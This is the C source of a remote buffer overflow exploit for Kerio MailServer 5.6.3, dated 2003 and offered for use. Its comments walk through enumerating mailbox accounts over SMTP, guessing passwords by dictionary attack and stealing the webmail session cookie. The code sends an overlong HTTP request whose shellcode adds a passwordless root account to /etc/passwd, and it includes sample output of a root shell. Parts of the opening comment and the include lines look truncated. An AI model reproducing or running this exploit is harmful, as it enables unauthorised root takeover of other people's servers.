/* Remote Buffer Overflow Exploit for Kerio MailServer 5.6.3 */ /* ========================================================= */ /* By B-r00t ok rcpt to: nosuchuser@scriptkiddie.net 550 5.1.1 Mailbox does not exist rcpt to:admin@scriptkiddie.net 250 2.1.5 Recipient ok (local) << default admin account. rcpt to: fred@scriptkiddie.net 250 2.1.5 Recipient ok (local) << user fred seems to exist. rset 250 2.0.0 Reset state quit 221 2.0.0 SMTP closing connection Connection closed by foreign host. */ /* Using a dictionary attack to obtain a large number */ /* of accounts in conjunction with users natural */ /* stupidity for using easy to guess passwords should */ /* yield at least one valid account. */ /* */ /* Once an account has been cracked, login to the */ /* Kerio webmail service and record the 'userid' */ /* cookie value: - */ /* $ lynx 192.168.0.10 Username: fred___________ Password: _______________ OK 192.168.0.10 cookie: userid=7dc1700017e708a5 Allow? (Y/N/Always/neVer) */ /* Accept the cookie 'Y' to ensure you are fully */ /* logged in to the Kerio webmail service. */ /* [br00t@silvia:~] $ ./keriobaby 192.168.0.10 userid=7dc1700017e708a5 Payload: 408 / 408 bytes Wall0p! ... !!! If successful a UID 0 Account 'keriohacker' has been appended to /etc/passwd. Use 'ssh' or 'su' (if local) to get r00t! .... [br00t@silvia:~] $ ssh -l keriohacker 192.168.0.10 Last login: Thu Jun 5 08:21:30 2003 sh-2.05# id uid=0(root) gid=0(root) groups=0(root) sh-2.05# tail -1 /etc/passwd keriohacker::0:0:B-r00t~R0x~Y3r~W0rld!.:/tmp:/bin/sh sh-2.05# *SSH assumes: PermitRootLogin yes & PermitEmptyPasswords yes Alternative: Recode the shellcode to add normal user! That's All Folks ... ENJOY! */ #include #include #include #include #include #include #include #define DEST_PORT 80 int main ( int argc, char *argv[] ) { int socketfd, bytes; struct sockaddr_in dest_addr; char buffer[700]; // char ret[] = "\x07\xf7\x7f\xbe"; // Use this if attached with GDB char ret[] = "\x07\xf7\xff\xbe"; // RedHat Linux 7.2 + kerio-mailserver-mcafee-5.6.3-rh7.i386.rpm char *ptr = buffer; char req[] = "GET /list?folder=~"; char cr[] = "\x0D\x0A"; char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // Fat Bloke Shellcode to avoid HTTP chars by B-r00t.. // Appends: keriohacker::0:0:B-r00t~R0x~Y3r~W0rld!.:/tmp:/bin/sh "\xeb\x55\x5e\xb0\xff\x2c\xd0\x88\x06\x88\x46\x04\x88\x46\x34" "\x88\x46\x39\x88\x46\x3d\x31\xc0\x88\x46\x0b\x88\x46\x41\x66" "\xb8\x0b\x27\x66\x2d\x01\x27\x66\x89\x46\x40\x8d\x5e\x0c\x89" "\x5e\x42\xb0\x05\x8d\x1e\x66\xb9\x42\x04\x66\xba\xe4\x01\xcd" "\x80\x89\xc3\xb0\x04\x8b\x4e\x42\x31\xd2\xb2\xff\x80\xea\xca" "\xcd\x80\xb0\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xa6\xff" "\xff\xff\x58\x65\x74\x63\x58\x70\x61\x73\x73\x77\x64\x58\x6b" "\x65\x72\x69\x6f\x68\x61\x63\x6b\x65\x72\x3a\x3a\x30\x3a\x30" "\x3a\x42\x2d\x72\x30\x30\x74\x7e\x52\x30\x78\x7e\x59\x33\x72" "\x7e\x57\x30\x72\x6c\x64\x21\x2e\x3a\x58\x74\x6d\x70\x3a\x58" "\x62\x69\x6e\x58\x73\x68\x58\x58\x41\x41\x41\x41" "\x90\x90\x90\x90\x90\x90"; memset (buffer, '\0', sizeof (buffer)); if (argc < 3) { printf("\nUsage: %s [IP_ADDRESS] [COOKIE]", argv[0]); printf("\nExample: %s 10.0.0.1 userid=771c740df0270936\n", argv[0]); exit (1); } printf ("\nPayload: %d / 408 bytes\n\n", strlen(shellcode)); strcpy (buffer, req); strcat (buffer, shellcode); strcat (buffer, ret); strcat (buffer, ret); strcat (buffer, " HTTP/1.0"); strcat (buffer, cr); strcat (buffer, "Cookie: "); strcat (buffer, argv[2]); strcat (buffer, cr); strcat (buffer, cr); if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){ perror("Socket"); exit (1); } dest_addr.sin_family = AF_INET; dest_addr.sin_port = htons(DEST_PORT); if (! inet_aton(argv[1], &(dest_addr.sin_addr))) { perror("inet_aton problems"); exit (2); } memset( &(dest_addr.sin_zero), '\0', 8); if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){ perror("connect failed"); close (socketfd); exit (3); } bytes = (send (socketfd, ptr, strlen(buffer), 0)); if (bytes == -1) { perror("send error"); close (socketfd); exit(4); } close (socketfd); printf ("\nWall0p! ... !!!\n\n"); printf ("\nIf successful a UID 0 Account 'keriohacker'"); printf ("\nhas been appended to /etc/passwd. Use 'ssh'"); printf ("\nor 'su' (if local) to get r00t! ....\n\n"); } /* Shoutz: Marshal-l, Rux0r, macavity, Monkfish, Mum & Dad. */ /* B-r00t aka B#. 2003. */ /* "If You Can't B-r00t Then Just B#." */ /* That One Doris ... U-Know-Who-U-R! */ /* THE END - AMEN. */